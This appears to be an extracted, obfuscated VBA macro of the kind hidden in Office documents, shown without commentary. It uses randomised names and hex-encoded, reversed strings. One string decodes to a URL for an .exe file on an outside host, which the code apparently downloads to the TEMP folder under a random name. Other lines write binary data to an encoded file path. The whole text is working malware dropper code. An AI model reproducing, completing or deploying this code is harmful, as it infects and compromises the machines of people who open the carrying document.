Put #21343, , okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw
Close #21343
iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq:
GoTo tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Dim tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756B6169796D6B656765656A61767079646F6E6D616C6E78656F737A6D6B6467616465676E6C6A68787A6B61786D6F71")) For Binary As #61689
Put #61689, , tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis
Close #61689
tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf:
     
End Function
Sub TFCVDJEJBJJ()
    OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
End Sub

Public Function trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy(ByVal cuvibyucfbvYCy As String) As String
  Dim oiuytevdfb4bf       As Long
  For oiuytevdfb4bf = 1 To Len(cuvibyucfbvYCy) Step 2
  trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy = trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy & Chr$(Val("&H" & Mid$(cuvibyucfbvYCy, oiuytevdfb4bf, 2)))
  Next oiuytevdfb4bf
 End Function